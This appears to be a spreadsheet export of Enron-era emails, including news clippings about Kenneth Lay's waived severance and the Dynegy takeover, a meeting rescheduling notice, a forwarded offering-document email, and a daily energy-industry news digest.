The company's stock price, which was in free fall after questions about the Fastow partnerships prompted an investigation by the Securities and Exchange Commission, fell to $7 a share in the wake of the disclosures. That was the lowest price for the stock since 1991. It rebounded to nearly $10 after Dynegy agreed to acquire the company in a stock swap. _x000D_
In January, Enron's board awarded another bonus to Mr. Lay, of $3.6 million. That was based entirely on the company's shareholder return from 1997 through 2000, which came to 294 percent, the company said. All of that return has since been wiped out. _x000D_
Also in January, Mr. Lay was awarded 106,578 shares of restricted stock, to vest periodically through 2004. All the shares will now vest when the Dynegy deal is completed, and while their value has plunged, the award is still worth more than $1 million. _x000D_
Still, Mr. Lay suffered huge paper losses this year. _x000D_
At the end of 2000, he had 5.1 million options that could have been exercised for profits of $257.5 million, and another 1.5 million options that would have been worth another $104.1 million when enough time had passed that they could be exercised -- assuming the share price stayed level. He exercised 565,928 of those options this year, making a profit of $20.7 million, but the ones he did not exercise are now under water._x000D_
_x000D_
Photo: Kenneth L. Lay, the chief executive of Enron, decided to give up his severance of more than $60 million after complaints from employees. (Associated Press)(pg. C10) Graph: ''Paid to Perform'' The compensation of Kenneth L. Lay, Enron's chief executive, has risen and fallen with the performance of the company's stock. Graph tracks Mr. Lay's income and Enron's year end stock price since 1989. (pg. C10) _x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
_x000D_
COMPANIES &amp; FINANCE THE AMERICAS - Regulators face new boundaries in Enron deal._x000D_
By NANCY DUNNE and PETER SPIEGEL._x000D_
_x000D_
11/14/2001_x000D_
Financial Times_x000D_
(c) 2001 Financial Times Limited . All Rights Reserved_x000D_
_x000D_
Regulators wading into the competitive landscape following Dynegy's offer to buy Enron will be scrutinising a new industry where traditional yardsticks like market definition and barriers to entry have yet to be determined. This will make gaining approval of the $10bn deal an uncertain and complicated task, experts said. _x000D_
Dynegy and Enron have insisted the merger, which will combine the largest energy trading company in the world with one of its largest competitors, will be approved by federal regulators without significant conditions or divestitures._x000D_
But competition lawyers said this week that because the market for energy trading is so new - indeed, it was all but created by Enron in the 1990s - that federal agencies will have to spend months finding out how rivals compete in order to develop guidelines to measure the merger's impact. _x000D_
"We don't have any track record here," said Ernest Gellhorn, an antitrust expert at George Mason University. _x000D_
The deal will be reviewed by state and federal agencies, but the most critical approvals will come from the Federal Energy Regulatory Commission (FERC) and US antitrust agencies. _x000D_
Central to the antitrust review will be how competition authorities define the market - how big it is, which companies are included as competitors, and how the market share is divided up. _x000D_
Former antitrust officials said Enron might be forced to resort to a "failing firm" defence, which is occasionally used by companies with large market shares when attempting to add to their dominant position. _x000D_
But Robert McTamaney, an antitrust partner at Carter Ledyard &amp; Milburn, said the failing-firm route may be difficult for Dynegy and Enron to prove, since it requires a showing that without the merger, Enron's trading business would exit the market completely. _x000D_
Helping the companies, however, is the relative ease with which competitors can enter the trading market, experts said. _x000D_
An analysis of barriers will hinge on whether rivals can successfully argue that the level of expertise in the industry is so sophisticated - or that Enron's trading technologies are so specialised - that it would be impossible for new entrants to duplicate the company's operations. _x000D_
Dynegy executives said they expect more scrutiny from FERC, though it rarely rejects mergers, and its guidelines put an emphasis on speed of reviews. _x000D_
(c) Copyright Financial Times Ltd. All rights reserved. _x000D_
http://www.ft.com._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
FRONT PAGE - COMPANIES &amp; MARKETS: Enron chief will turn down Dollars 60m takeover windfall _x000D_
Financial Times; Nov 14, 2001_x000D_
By SHEILA MCNULTY and PETER THAL LARSEN_x000D_
_x000D_
Ken Lay, the chairman and chief executive of Enron, is set to turn down a Dollars 60.6m pay-off to which he was entitled following the troubled power group's takeover by Dynegy._x000D_
Mr Lay, who oversaw Enron's rapid rise and its subsequent collapse and sale to Dynegy, was due the payment under an employment contract he extended when he resumed full control of the company in August 2001._x000D_
However Mr Lay decided yesterday after meeting with some Enron employees that he would turn down the payment._x000D_
"Ken Lay will not accept the Dollars 60m when he leaves," an Enron spokeswoman said. "He felt like it was not the right thing to do."_x000D_
According to a filing with the Securities and Exchange Commission, Mr Lay is entitled to Dollars 20.2m in cash for every remaining year in his employment contract if he leaves Enron within 60 days of the company being taken over._x000D_
Mr Lay's decision is in sharp contrast to other senior US executives who have negotiated - and accepted - "golden parachutes" which guarantee them large payments even if they oversaw large-scale destruction in shareholder value._x000D_
Mr Lay had previously come under fire from shareholders for selling some of his Enron shareholding before the collapse in the company's stock price. Between January and July this year, he sold Enron shares with an estimated value of more than Dollars 27.5m._x000D_
At the close of trading yesterday Enron was valued at Dollars 7.5bn, compared with a peak of Dollars 65.9bn in August last year._x000D_
The terms were part of Mr Lay's original employment contract, which had been due to expire in December 2003. But in August, following the sudden departure of chief executive Jeff Skilling, Enron's board extended Mr Lay's contract by two years._x000D_
At the time, the contract extension was seen as an attempt by Mr Lay to restore investor confidence in the company. But it also ensured he would receive an additional Dollars 40.4m if he left following a sale._x000D_
After the Dollars 10.8bn Dynegy takeover, Mr Lay is expected to give up his executive responsibilities. He may join the combined group's board of directors but this will not affect his eligibility for a pay-off. The deal, which requires the approval of US competition authorities, is expected to be completed next year._x000D_
Copyright: The Financial Times Limited 1995-1998_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Business; Financial Desk_x000D_
Enron Chief Relinquishes Severance Pay_x000D_
JERRY HIRSCH_x000D_
TIMES STAFF WRITER_x000D_
_x000D_
11/14/2001_x000D_
Los Angeles Times_x000D_
Home Edition_x000D_
C-1_x000D_
Copyright 2001 / The Times Mirror Company_x000D_
_x000D_
Enron Corp. Chief Executive Kenneth L. Lay on Tuesday waived a severance payment of at least $60 million due him when Dynegy Inc. completes its expected acquisition of Enron next year, company officials said. _x000D_
The potential payment, disclosed in a Securities and Exchange Commission regulatory filing Tuesday, would undoubtedly have sparked additional controversy, given Lay's primary role in the sharp fall of Enron's stock and worsening financial condition, which led to the Dynegy deal._x000D_
The payment would have been one of the biggest rewards for failure in corporate history, said Graef Crystal, a leading compensation expert. _x000D_
The payment would have topped the nearly $40 million Mattel Inc. paid former Chief Executive Jill Barad after she was ousted in 2000 after spending $3.6 billion to purchase a money-losing software business the company eventually gave away to a technology group in return for a slice of future profit. _x000D_
It would have been almost double the $35 million in severance collected by former Xerox Corp. Chief Executive Richard Thoman when he was fired in May 2000 after a disastrous reorganization of the copier company's sales force. _x000D_
According to Enron spokeswoman Karen Denne, Lay spoke to a number of employees Tuesday and "decided that the best course of action would be for him to waive his right to payment." _x000D_
"Instead," Denne said, "the combined company would decide the best use of those funds." _x000D_
Lay and Enron have run into a storm of criticism in recent weeks after the disclosure of a series of partnerships and the dismissal of several top executives who invested in those ventures. _x000D_
News of the partnerships and their losses forced the Houston-based company to restate its earnings last week, reducing corporate profits over the last four years by $586 million, or about 20%, to $2.3billion. _x000D_
Shareholders have filed a series of lawsuits against Enron, charging the company with failing to disclose key information about its operations and financial structure. _x000D_
The negative disclosures sparked a cash crunch and threatened Enron with collapse until it was saved by an agreement Friday to be acquired by Houston-based Dynegy for $9 billion. _x000D_
Shareholders have watched the value of Enron shares decline almost 90% from a high of nearly $90 on Aug. 23, 2000. Its shares closed Tuesday at $9.98, up 74cents, on the New York Stock Exchange. _x000D_
CEO Already Reaped _x000D_
$150 Million in Options _x000D_
According to the regulatory filing, Lay stood to collect $20.2 million a year, plus certain extraordinary tax expenses, for each of the full years remaining on his contract once the company was acquired. _x000D_
If the Dynegy deal is completed as expected next year, Lay's payment would have totaled at least $60.6 million. His contract ends on Dec. 31, 2005. _x000D_
Lay already reaped about $150million in stock option gains the last two years alone. Those gains were in part made possible by rosy Enron profit statements, which the company restated downward last week, Crystal said. _x000D_
"It is a good move to waive the payment," Crystal said. "But that's just the down payment on what he should give back. There is probably another $100 million in option profits he should give back. Had they correctly stated the books, the stock would not have risen as high and he would not have made as much from exercising his stock options in the company." _x000D_
A stock option gives the holder the right to purchase a share of a company at a predetermined price. Options are a common executive pay incentive, allowing the individual to purchase and sell the shares, pocketing the gains in their appreciation. Lay made $123 million off such transactions last year and $26 million this year, Crystal said. _x000D_
Lay since 1989 has had a "change of control" clause that awards him a special payment if Enron changes hands. The company described the clause as a standard part of executive employment agreements common to many companies. _x000D_
Some Wall Street analysts said the liability for the payment would be Dynegy's problem at the point the merger is completed. Enron shareholders already have suffered al</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 12:40:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jack.boatman@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'james.studebaker@enron.com', 'blair.lichtenwalter@enron.com', 'teb.lokey@enron.com', 'rick.dietz@enron.com', 'buzz.smith@enron.com', 'frazier.king@enron.com', 'jack.boatman@enron.com', 'nancy.bastida@enron.com', 'sheila.nacey@enron.com', 'sharon.farrell@enron.com', 'rachel.cady@enron.com'})</t>
  </si>
  <si>
    <t>RE: Gulfstream Interconnects - Meeting Wednesday 1/16 at 1:30 in_x000D_
 EB39C1 - DATE CHANGE</t>
  </si>
  <si>
    <t xml:space="preserve">	Date Change - due to scheduling conflicts for several people this meeting is now planned for Wednesday at 1:30 in 39C1._x000D_
_x000D_
	Let me know if this time does not work for you._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Boatman, Jack  _x000D_
Sent:	Thursday, January 10, 2002 12:32 PM_x000D_
To:	Nacey, Sheila; Studebaker, James ; Bastida, Nancy; Lokey, Teb; Lichtenwalter, Blair; King Jr., Frazier; Cady, Rachel; Farrell, Sharon; Smith, Buzz; Dietz, Rick_x000D_
Subject:	Gulfstream Interconnects - Meeting Tuesday 1/15 at 1:30 in EB39C1_x000D_
_x000D_
Please plan to attend a meeting on Tuesday 1/15 at 1:30 in 39C1 to initiate discussions on potential business/system implications associated with the new Gulfstream interconnects in Florida.  _x000D_
_x000D_
These will be new receipt points in the FL Market Area and will go in-service by May/June. </t>
  </si>
  <si>
    <t>Sat, 20 May 2000 04:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'johnna.kokenge@enron.com', 'jeff.nogid@enron.com', 'kimberly.scardino@enron.com', 'ryan.siurek@enron.com', 'sara.shackleton@enron.com', 'pushkar.shahi@enron.com', 'annmarie.tiller@enron.com', 'paige.grumulaitis@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">All -_x000D_
Sorry for getting this to you late, but we didn't get this until Friday _x000D_
afternoon, and for some reason it did not make it out to the team on Friday.  _x000D_
I do not know when we will be receiving the rest of the documents.  Please _x000D_
provide us with whatever comments you can at our meeting at 3:00 on Monday.  _x000D_
CF_x000D_
---------------------- Forwarded by Clint Freeland/Corp/Enron on 05/20/2000 _x000D_
11:22 AM ---------------------------_x000D_
_x000D_
_x000D_
mukunah@winstim.com on 05/19/2000 01:48:47 PM_x000D_
To: clint.freeland@enron.com, mark.taylor@enron.com, _x000D_
gareth.bahlmann@enron.com, kimberly.blue@ubsw.com, scott.whitney@ubsw.com, _x000D_
ryan.donovan@ubsw.com, scott.giese@ubsw.com, timothy.steele@ubsw.com, _x000D_
michael.davidson@ubsw.com, william.sullivan@ubsw.com, john.magovern@ubsw.com, _x000D_
rastin@velaw.com, mspradling@velaw.com, mshiang@bankofny.com_x000D_
cc: ecklandt@winstim.com, delaneyj@winstim.com, chudyj@winstim.com, _x000D_
earlyhud@winstim.com, kurzw@winstim.com _x000D_
_x000D_
Subject: Enron PATS 2000-1_x000D_
_x000D_
_x000D_
 In connection with the proposed offering of Enron's PATS, we're attaching a_x000D_
Cover Letter, the Preliminary Offering Circular and the Closing Document List._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Hazel Mukuna_x000D_
_x000D_
(See attached file: Cover Letter.doc)    (See attached file: Preliminary_x000D_
Offering Circular.doc)        (See attached file: Closing Document List.doc)_x000D_
_x000D_
_x000D_
_______________________________________x000D_
This message, together with any attachments, is intended only for the_x000D_
use of the individual or entity to which it is addressed and may contain_x000D_
information that is legally privileged, confidential and exempt from_x000D_
disclosure.  If you are not the intended recipient, you are hereby_x000D_
notified that any dissemination, distribution, or copying of this_x000D_
message,or any attachment, is strictly prohibited.  If you have received_x000D_
this message in error, please notify the original sender (or the WSPR_x000D_
Help Desk) immediately by telephone (212-858-1000) or by return_x000D_
E-mail and delete the message, along with any attachments, from_x000D_
your computer.  Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Cover Letter.doc_x000D_
 - Preliminary Offering Circular.doc_x000D_
 - Closing Document List.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 13:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PowerMarketers.com Daily Power Report for 26 January 2001</t>
  </si>
  <si>
    <t>Attention POWER REPORT Readers: Go to _x000D_
http://www.powermarketers.com/prdaily.htm to view today's edition with direct _x000D_
headline links to each story.]_x000D_
_x000D_
======================================================================_x000D_
The Industry's Preferred Source For Breaking Energy News And Information_x000D_
http://www.powermarketers.com_x000D_
----------------------------------------------------------------------_x000D_
T H E P O W E R M A R K E T E R S .C O M P O W E R R E P O R T_x000D_
_x000D_
Today's Headlines From POWERMARKETERS.COM_x000D_
_x000D_
Subscriptions to The PowerMarketers.com Power Report are free - you will _x000D_
never be charged._x000D_
_x000D_
You may redistribute this e-mail without change. You may not redistribute _x000D_
stories._x000D_
_x000D_
To register for a free subscription, point your browser to: _x000D_
http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
------Advertisement------_x000D_
_x000D_
POWER CRUNCH IN THE WEST_x000D_
February 12-14, 2001  SAN DIEGO, CA_x000D_
_x000D_
Early Bird Special  till January 26! (See brochure)_x000D_
http://www.pmaconference.com/crunch.pdf_x000D_
_x000D_
Get a serious understanding of the latest developments in California and _x000D_
throughout the West that you just can't read about in the newspapers from the _x000D_
key people directly tackling these issues, including:_x000D_
_x000D_
- Senator Deborah Bowen, Chair of the California State Senate Energy, _x000D_
Utilities, and Communications Committee_x000D_
- Loretta Lynch, President of the California Public Utilities Commission_x000D_
- William Keese, Chair of the California Energy Commission_x000D_
- Stephen L. Baum, CEO of Sempra Energy Corporation_x000D_
- Curtis L. H,bert, FERC Commissioner_x000D_
_x000D_
And representatives from key market players including Sempra Energy, PG &amp; E, _x000D_
Southern California Edison, Arizona Public Service, Duke Energy, Reliant _x000D_
Energy, Calpine, California Manufacturer's Association, TURN, UCAN, _x000D_
California Power Exchange, California ISO, Automated Power Exchange, _x000D_
Northwest Planning Council and more..._x000D_
_x000D_
For a full description of the program, download the brochure at:_x000D_
http://www.pmaconference.com/crunch.pdf_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
------Advertisement------_x000D_
_x000D_
NEW! Consumers Say What They Really Think About Electricity Deregulation in _x000D_
Power Perceptions study:_x000D_
_x000D_
                                    THE ENERGY CONSUMER_x000D_
 &lt;http://www.powerperceptions.com/ec2000/ec2000home.htm&gt; ._x000D_
_x000D_
Millions of Americans have a choice of electricity providers, yet few are _x000D_
switching. What can electric companies do to get more residential customers? _x000D_
Power Perceptions &lt;http://www.powerperceptions.com/&gt; , a Boulder, CO, based _x000D_
market research firm, has some answers._x000D_
_x000D_
                                    THE ENERGY CONSUMER_x000D_
&lt;http://www.powerperceptions.com/ec2000/ec2000home.htm&gt;_x000D_
_x000D_
the company's most recent study, has more than 550 pages of detailed _x000D_
information on what residential electricity customers think about electronic _x000D_
billing, bundling, incentives, and green power. Easy-to-read graphics and _x000D_
detailed tables help companies find information quickly. And sophisticated _x000D_
analysis helps companies target demographic and attitudinal segments.The _x000D_
report is based on a nationwide telephone survey of 2,068 residential _x000D_
decision makers. Whether a company has conducted extensive market research in _x000D_
the residential electricity market or is just getting started, the Energy _x000D_
Consumer contains data that will help them add and retain customers._x000D_
_x000D_
For more information, PMA discount offer and a complimentary chapter,_x000D_
contact:_x000D_
_x000D_
Lori Pestka_x000D_
Manager, Marketing &amp; Sales_x000D_
Phone 303-447-0398 ext. 29_x000D_
lori@powerperceptions.com_x000D_
_x000D_
Power Perceptions, a division of FriedWire, Inc &lt;http://www.friedwire.com/&gt; _x000D_
conducts market research on residential electricity consumers _x000D_
nationwide.Visit powerperceptions.com _x000D_
&lt;http://www.powerperceptions.com/pr/pr1.htm&gt; for more information about their _x000D_
products and services._x000D_
_x000D_
FREE! For valuable sample research, go to:_x000D_
 &lt;http://www.powerperceptions.com/essays/EssaysWhitePapers.htm&gt;_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
--------------------T O P S T O R I E S--------------------_x000D_
_x000D_
Top Stories (January 25)_x000D_
_x000D_
ENERGY STARVED CALIFORNIA CRAFTS PLAN_x000D_
Lawmakers are considering a plan under which California would issue bonds to _x000D_
cover the multibillion-dollar debts of its two biggest electric utilities and _x000D_
make customers pay the money back over a decade._x000D_
http://199.97.97.163/IMDS%PMANAT0%read%/home/content/users/imds/feeds/comtex/2_x000D_
001/01/25/ao/0000-3793-power-woes_x000D_
_x000D_
CALIFORNIA EYES ACQUISITION OF UTILITIES POWER CONTRACTS FROM CALPX_x000D_
California State Sen. Debra Bowen has drafted emergency legislation that _x000D_
would allow the state to acquire hundreds of millions of dollars in forward _x000D_
power contracts owned by Pacific Gas &amp; Electric and Southern California _x000D_
Edison that are in "danger of being liquidated by the state's Power Exchange."_x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
01/25/eng-djn/eng-djn_022059_174_42226761952_x000D_
_x000D_
PANEL PULLS PLUG ON NORTH CAROLINA DEREGULATION PLAN_x000D_
Because of worries caused by the recent rolling blackouts in California, a _x000D_
legislative panel agreed yesterday to shelve plans to deregulate the power _x000D_
industry in North Carolina this year._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/01/25/krtbn/0000-0634-WN-UTILITY_x000D_
_x000D_
SANTA FE, NEW MEXICO-AREA POWER PLANT GETS APPROVAL FROM REGULATORS_x000D_
State regulators on Tuesday gave the green light to build a 600-megawatt, _x000D_
natural gas-fired power plant in Deming that would beef up electric supplies _x000D_
for power-hungry Western states._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/01/25/krtbn/0000-0012-AQ-POWER-PLANT_x000D_
_x000D_
TRANSALTA TO BUY BINGHAMTON, NEW YORK POWER PLANT FOR $9M_x000D_
TransAlta Corp. (T.TA) has acquired a 55-megawatt, gas-fired power plant in _x000D_
Binghamton, N.Y. for $9 million._x000D_
http://199.97.97.79/IMDS%PMADJN0%read%/home/content/users/imds/feeds/djn/2001/_x000D_
01/25/eng-djn/eng-djn_123337_37_6177456090227_x000D_
_x000D_
GERMAN ENERGY GIANT LOOKS TO ENTER UNITED KINGDOM, U.S. VIA POWERGEN MERGER_x000D_
Yet another continental utility is considering a move into Britain, where the _x000D_
electricity and gas markets are the most open in Europe._x000D_
http://199.97.97.163/IMDS%PMAKRT0%read%/home/content/users/imds/feeds/knightri_x000D_
dder/2001/01/25/krtbn/0000-0531-SU-ENERGY-MERGER_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
DOW JONES NEWSWIRES_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: _x000D_
http://199.97.97.79/IMDS|PMADJN0,PMADJN1,PMADJN2,PMADJN3,PMADJN4|index_x000D_
_x000D_
REPEAT:PG&amp;E Up 15%, Edison Intl Up 23% On Merrill Upgrade_x000D_
_x000D_
Enron Not Raising Stake In India's Dabhol Power Project_x000D_
_x000D_
PG&amp;E Up 15%, Edison Intl Up 23% On Merrill Upgrade &gt;PCG_x000D_
_x000D_
TransAlta/Plant -2: First Power Plant Buy In N.Y. State_x000D_
_x000D_
Sempra Energy Earnings -4: Calif. Mkt Hurt 4Q Growth &gt;SRE_x000D_
_x000D_
Sempra Energy Earnings -5: Year Financial Table &gt;SRE_x000D_
_x000D_
Sempra Energy Earnings -3: First Call '01 EPS View $2.19_x000D_
_x000D_
Sempra Energy Earnings -2: 4Q Financial Table &gt;SRE_x000D_
_x000D_
Cinergy Earnings -4: Focusing On 4 Business Segments &gt;CIN_x000D_
_x000D_
Sempra Energy 4Q Net 47c A Share vs 44c &gt;SRE_x000D_
_x000D_
Cinergy Corp Earnings -3: Yr Fincl Table, Comment &gt;CIN_x000D_
_x000D_
Sempra Energy 4Q Rev $2.32B vs $1.47B &gt;SRE_x000D_
_x000D_
TransAlta To Buy Binghamton, N.Y. Power Plant For $9M_x000D_
_x000D_
Cinergy Corp Earnings -2: 4Q Financial Table &gt;CIN_x000D_
_x000D_
Telecom Italia Venezuela Unit Leads Bids In 2 WLL Regions_x000D_
_x000D_
Cinergy Corp 4Q Oper Net 64c/Shr Vs Net 60c &gt;CIN_x000D_
_x000D_
Cinergy Corp 4Q Revenue $2.77B Vs $1.48B &gt;CIN_x000D_
_x000D_
US Weather:Snow In Great Lakes, Rain In Most of The West_x000D_
_x000D_
TXU Confirms Plans To Sell 19.2% Cantabrico Stake &gt;E.HIC_x000D_
_x000D_
Electrabel/Cantabrico -2: Seen Selling Stake_x000D_
_x000D_
Ratings Watch: Nordic Outlook Sunnier Than California_x000D_
_x000D_
Electrabel Won't Bid Higher For Cantabrico Or For 100%_x000D_
_x000D_
CNMV/Cantabrico -2: Follows EDP, Cajastur Counter-Bid_x000D_
_x000D_
CNMV To Lift Cantabrico Suspension At 1100 GMT &gt;E.HIC_x000D_
_x000D_
Cantabrico/EDP/Cajastur-4: EDP To Hold 40%-50% Stake &gt;EDP_x000D_
_x000D_
Cantabrico/EDP/Cajastur -3: TXU Accepts Bid &gt;EDP TXU_x000D_
_x000D_
UniSource Energy Estimate -2:First Call Yr View $1.08/Shr_x000D_
_x000D_
Calif Eyes Acquisition Of Utils Pwr Contracts From CalPX_x000D_
_x000D_
PRESS RELEASE: Calif ISO Extends Stage 3 Emergency To Thu_x000D_
_x000D_
FREE TRIAL: For a free trial of the Dow Jones Energy Service go to_x000D_
www.dowjonesnews.com, and click "create account," or call_x000D_
1-800-223-2274._x000D_
_x000D_
----------------------------------------------------------------------_x000D_
N A T I O N A L_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://www.powermarketers.com/pma-nat.htm_x000D_
_x000D_
Arc Energy Trust And Startech Energy Inc. Announce the Approval of The Plan _x000D_
of Arrangement_x000D_
_x000D_
Bush Tries to Ease Power Woes_x000D_
_x000D_
Dominion East Ohio Pledges $1 Million to Energy Assistance Fuel Fund_x000D_
_x000D_
Economic Development Power Allocation Board to Meet_x000D_
_x000D_
Energy-Starved Calif. Crafts Plan_x000D_
_x000D_
Business, Labor Call For New Power Plants_x000D_
_x000D_
Advisory/Energy Producers Power Update_x000D_
_x000D_
Top Energy Summaries - Thursday, January 25, 2001 - 5:29 PM_x000D_
_x000D_
Energyunited Executive Urges State to Deal with Municipal Power Agency Debt _x000D_
While Deregulation of Industry Is on Hold_x000D_
_x000D_
Consol Energy Declares Regular Quarterly Dividend of $0.28 Per Share_x000D_
_x000D_
Fitch Downgrades CE Generation to `Bb'; Rating Watch Evolving_x000D_
_x000D_
Double Star Energy Creates Canadian Affiliate; Canadian Affiliate Complements _x000D_
Double Star Energy's Texas Activities_x000D_
_x000D_
Transalta Acquires Power Plant in New York State Through Mega_x000D_
_x000D_
New World Power Signs Agreement to Acquire Rhode Island Utility_x000D_
_x000D_
Energy Demand Seen Rising This Year_x000D_
_x000D_
Helios Energy Adds New Directors_x000D_
_x000D_
Top Energy Summaries - Thursday, January 25, 2001 - 2:44 PM_x000D_
_x000D_
Repeats: Energy Volume And Open Interest Totals-Jan 25_x000D_
_x000D_
Southwestern Energy Announces Gas Discovery in South Louisiana_x000D_
_x000D_
Bear Stearns Initiates General Electric at Buy, $75 Target (Ge)_x000D_
_x000D_
Ubs Warburg Upgrades Amer. Electric Power to Buy from Hold (Aep)_x000D_
_x000D_
Bnsf Launches Unique Web-Based Coal Forecasting Tool_x000D_
_x000D_
Energy Update/Los Angeles Department of Water And Power Daily Energy Update, _x000D_
Thursday, January 25, 2001_x000D_
_x000D_
Investec Initiates Coverage of Electric Fuel Corporation_x000D_
_x000D_
Fitch Publishes Credit Update Reports on Several Power Companies_x000D_
_x000D_
Blackouts Aren't in Idaho's Future, Power Providers Say But Groups Urge _x000D_
Consumers to Use Energy Wisely_x000D_
_x000D_
Idacorp Sells Its Solar Business Washington State Facility Purchased by _x000D_
Schott Corp._x000D_
_x000D_
TransAlta Acquires Power Plant in New York State Through_x000D_
_x000D_
Utility Executives Defend Soaring Gas Bills Profits Aren't Keeping Pace _x000D_
Companies Tell State Legislators; Laclede May Get Rate Hike Today_x000D_
_x000D_
Calif. Crafting Long-Term Power Plan_x000D_
_x000D_
Conolog to Accelerate Delivery of Its New All-Digital Mutli-Directional _x000D_
Protection Unit to West Coast Utility Customers_x000D_
_x000D_
Fuelcell Energy Signs with King County, Washington for Digester / Direct _x000D_
Fuelcell Energy Project_x000D_
_x000D_
Cbiglobalenergy.Com, Global Energy Portal_x000D_
_x000D_
TVA unlikely to face energy crunch_x000D_
_x000D_
Turning on Solar_x000D_
_x000D_
Restarting 2 Power Plants to Ease Calif. Crisis Booting Up Off-Line _x000D_
Facilities Will Help, But Threats Remain_x000D_
_x000D_
Energy Legislation: Gop Bill Encourages Nuclear Power_x000D_
_x000D_
Wholesale Power Bids Brighten State Outlook / Davis Says 'There's a Long Way _x000D_
to Go,' But Calls Auction A Success_x000D_
_x000D_
California on Its Own for Power After Feb. 7 / State on Own After Feb. 7_x000D_
_x000D_
Ken Garcia ; Power Crisis Could Teach Bush Lesson / Ignoring California Is _x000D_
Not a Smart Idea_x000D_
_x000D_
Nuclear Power_x000D_
_x000D_
Pud Expects Some Big New Power Users_x000D_
_x000D_
Deal May Lock in Power Rates Until Autumn_x000D_
_x000D_
State May Own Power Plants_x000D_
_x000D_
Public Forum Energy Crisis_x000D_
_x000D_
Sharing the Energy Cities of Power Plenty Cut Back to Aid Others_x000D_
_x000D_
Energy Constraints Damaging Economic Outlook for U.S._x000D_
_x000D_
Opening Energy Systems_x000D_
_x000D_
Icc Told Natural Gas Prices Not Local Suppliers' Fault_x000D_
_x000D_
Terra to Join GE in Major Coal Demonstration Project_x000D_
_x000D_
Power Up Iowa Before It's Too Late_x000D_
_x000D_
-Utility's Plan to Build Power Plant in Noblesville, Ind., Generates _x000D_
Opposition_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
I N T E R N A T I O N A L_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://www.powermarketers.com/pma-intr.htm_x000D_
_x000D_
Sempra Energy Could Act in Baja California Natural Gas Crisis: Analysts_x000D_
_x000D_
Egypt wins 10-yr, 3 bln usd contract to supply Israel with natural gas_x000D_
_x000D_
Israel to Buy Natural Gas from Egypt_x000D_
_x000D_
Enron Negotiates Entry to Generation Market - Argentina_x000D_
_x000D_
Top Energy Summaries - Thursday, January 25, 2001 - 12:33 PM_x000D_
_x000D_
Porvair to Switch Focus to Fuel Cell Technology_x000D_
_x000D_
Top Energy Summaries - Thursday, January 25, 2001 - 7:40 Am_x000D_
_x000D_
Ocean Energy Announces Record 2000 Financial Results_x000D_
_x000D_
US firm to tender shares in Spanish power group_x000D_
_x000D_
Householders Could Save Pounds 100 on Their Energy Bills_x000D_
_x000D_
Waertsilae wins order to deliver floating power barge to Dominican Republic_x000D_
_x000D_
Israel: Iec's Proposal for Coal-Fired Power Plant Opposed_x000D_
_x000D_
Australian Power Consumption Rising Faster Than Population_x000D_
_x000D_
Iran And Armenia to Discuss Joint Fuel, Energy Projects_x000D_
_x000D_
Cairn Energy Discovers Hydrocarbon in Western Indian State_x000D_
_x000D_
Power Price Increase Likely Next Month_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
KRT DAILY ENERGY NEWS_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at http://www.powermarketers.com/pma-krt.htm_x000D_
_x000D_
Panel Pulls Plug on North Carolina Deregulation Plan_x000D_
_x000D_
Experts Link California Energy Crisis to High Natural Gas Prices in Midwest_x000D_
_x000D_
Sunday Business, London, Liam Halligan Column_x000D_
_x000D_
German Energy Giant Looks to Enter United Kingdom, U.S. Via Powergen Merger_x000D_
_x000D_
Utah's Replacement Utility Bill Is Still a Hotbed of Controversy_x000D_
_x000D_
Controversial Utility Bill Comes Undone in Utah_x000D_
_x000D_
Utility Firm's Rate Increase Request Is Met with Anger in Idaho_x000D_
_x000D_
Avista Says Northwest Natural-Gas Rate Hike Would Fund Conservation_x000D_
_x000D_
California Utility Seeks State Approval to Pay Natural Gas Suppliers First_x000D_
_x000D_
Bush Extends Order Forcing Suppliers to Sell Electricity in California_x000D_
_x000D_
California Municipal Utilities Get Step Ahead: Deregulation Exclusion Helps_x000D_
_x000D_
Energy Costs Devour California Government Funds_x000D_
_x000D_
California Has Little Hope of More U.S. Energy Help: Bush Linked to Suppliers_x000D_
_x000D_
Bush Extends Emergency Orders Averting Big California Blackouts_x000D_
_x000D_
Bankruptcy Unlikely Cure for California Energy Crisis_x000D_
_x000D_
Federal Commission May Thwart Virginia's Plans for Electric Deregulation_x000D_
_x000D_
Roanoke, VA.-Based Power Company Reports Higher Profits After Merger_x000D_
_x000D_
California Lawmakers' Power Plan Gets Push_x000D_
_x000D_
California Weighs Bond Sales to Finance Power Purchases_x000D_
_x000D_
Oregon Power Rates Are Almost Certain to Rise_x000D_
Pacificorp Willing to Modify Oregon Dam for Fish_x000D_
_x000D_
Utility.Com Plans to Disconnect 30,000 Pennsylvania Electric Customers_x000D_
_x000D_
Illinois Fares Better Than California in Deregulation of Electricity_x000D_
_x000D_
Philadelphia Council to Approve $20 Million for City-Owned Utility_x000D_
_x000D_
